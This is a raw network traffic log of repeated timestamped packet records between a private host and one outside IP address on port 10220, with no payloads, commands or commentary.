                                                                                                                                                                      Jan 12, 2024 06:48:16.027673006 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027702093 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027797937 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027816057 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027832031 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027844906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027873993 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027939081 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027956009 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027973890 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028004885 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028004885 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028254032 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028275013 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028318882 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028347015 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028402090 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028418064 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028458118 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028501987 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028587103 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028615952 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028649092 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028667927 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028673887 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028691053 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028707981 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028721094 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028747082 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028747082 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028779984 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028826952 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028975964 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028992891 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029022932 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029067993 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029159069 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029175043 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029191971 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029206038 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029236078 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029237032 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029284000 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029306889 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029335976 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029365063 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029490948 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029515982 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029542923 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029586077 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029618025 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029675961 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029788017 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029839993 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029860973 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029879093 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.029927015 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029927015 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.029977083 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030106068 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.030138016 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030179977 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030225039 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.030316114 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030333996 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030368090 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.030390024 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.030400991 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030443907 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.030591011 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030616045 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030648947 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.030649900 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.030769110 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030791044 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030836105 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.030836105 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.030932903 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.030987978 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.031116009 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.031131983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.031184912 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.031184912 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.031275988 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.031292915 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.031322956 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.031351089 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.031403065 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.031424999 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.031470060 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.031567097 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.031615973 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.031802893 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.031863928 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.031980038 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.031996965 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032011986 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032028913 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032031059 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032064915 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032064915 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032151937 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032171965 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032191992 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032207966 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032207966 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032232046 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032259941 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032316923 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032335043 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032383919 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032491922 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032515049 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032557964 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032747984 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032771111 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032788038 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032814980 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032814980 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032861948 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.032919884 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.032980919 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033104897 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033128977 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033159971 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033190012 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033282042 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033298969 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033314943 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033334970 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033365011 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033365011 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033399105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033422947 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033437967 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033466101 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033610106 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033627033 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033659935 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033689022 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.033782005 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033807039 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.033857107 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.034290075 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.034342051 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.034657001 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.034831047 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.034842014 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.034852982 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.034879923 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.034909964 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035021067 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035042048 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035156012 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035195112 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035212040 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035228014 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035243034 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035274029 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035274029 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035387993 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035413027 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035429001 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035435915 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035470009 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035470009 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035553932 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035574913 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035625935 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035712957 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035737991 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035788059 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035881042 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035902977 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035919905 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.035933018 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035967112 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.035967112 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036051035 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036070108 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036087036 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036099911 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036135912 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036135912 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036338091 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036359072 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036375046 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036406040 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036432981 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036475897 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036501884 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036534071 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036561966 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036654949 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036678076 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036703110 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036731958 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036812067 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036834002 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036879063 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036988020 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037004948 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037022114 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037046909 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037076950 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037139893 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037187099 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037483931 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037508011 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037538052 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037568092 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037647963 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037672043 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037710905 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037712097 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037801981 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037822962 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037868023 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037914991 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037986040 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038009882 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038033009 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038043976 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038069963 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038090944 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038139105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038285971 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038325071 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038347960 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038371086 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038399935 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038501024 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038518906 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038552046 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038563013 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038572073 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038614035 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038765907 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038786888 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038837910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038837910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038921118 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038947105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038968086 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038995028 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039021969 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039246082 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039268970 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039284945 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039315939 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039345026 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039391041 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039443016 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039701939 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039726019 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039764881 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039764881 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039872885 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039896011 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039932013 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039975882 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040010929 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040028095 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040070057 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040097952 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040186882 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040213108 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040244102 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040267944 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040448904 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040494919 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040625095 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040653944 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040678024 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040707111 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040767908 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040791035 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040821075 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040849924 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040965080 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040987968 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041023016 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041023016 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041105986 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041224003 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041277885 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041301012 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041327000 CET4975110220192.168.2.4116.202.0.196
